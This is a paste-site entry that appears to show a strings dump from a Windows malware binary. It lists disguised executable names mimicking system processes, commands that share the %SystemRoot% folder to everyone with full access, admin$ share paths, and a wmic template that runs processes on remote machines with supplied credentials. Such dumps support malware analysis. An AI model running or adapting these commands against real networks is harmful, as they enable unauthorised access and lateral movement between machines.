Demo entry 6718954



Submitted by ASDAS on Mar 07, 2018 at 14:06
Language: C. Code size: 1.5 kB.

00000000D020   00000040D020      0   recdiscm32.exe
00000000D124   00000040D124      0   taskhosts64.exe
00000000D228   00000040D228      0   taskchg16.exe
00000000D32C   00000040D32C      0   rdpshellex32.exe
00000000D430   00000040D430      0   mobsynclm64.exe
00000000D534   00000040D534      0   comon32.exe
00000000D638   00000040D638      0   diskpartmg16.exe
00000000D73C   00000040D73C      0   dpnsvr16.exe
00000000D840   00000040D840      0   expandmn32.exe
00000000D944   00000040D944      0   hwrcompsvc64.exe

00000000DA60   00000040DA60      0   cmd.exe /q /c net share shared$ /delete
00000000DA88   00000040DA88      0   \\%s\admin$\syswow64
00000000DAA0   00000040DAA0      0   \\%s\admin$\system32
00000000DAB8   00000040DAB8      0   cmd.exe /q /c net share shared$=%SystemRoot%
00000000DAE8   00000040DAE8      0   cmd.exe /q /c net share shared$=%SystemRoot% /GRANT:everyone,FULL
00000000DB2C   00000040DB2C      0   \\%s\shared$\syswow64
00000000DB44   00000040DB44      0   \\%s\shared$\system32
00000000DB5C   00000040DB5C      0   \\%s\admin$

00000000DB84   00000040DB84      0   calc.exe
00000000DB90   00000040DB90      0
00000000DBA0   00000040DBA0      0
00000000DBB0   00000040DBB0      0
00000000DBC4   00000040DBC4      0   igfxtrayex.exe
00000000DBD4   00000040DBD4      0   net_ver.dat
00000000DBFC   00000040DBFC      0   cmd.exe /c wmic.exe /node:"%s" /user:"%s" /password:"%s" PROCESS CALL CREATE "%s" > %s

This snippet took 0.00 seconds to highlight.

Back to the Entry List or Home.

Delete this entry (admin only).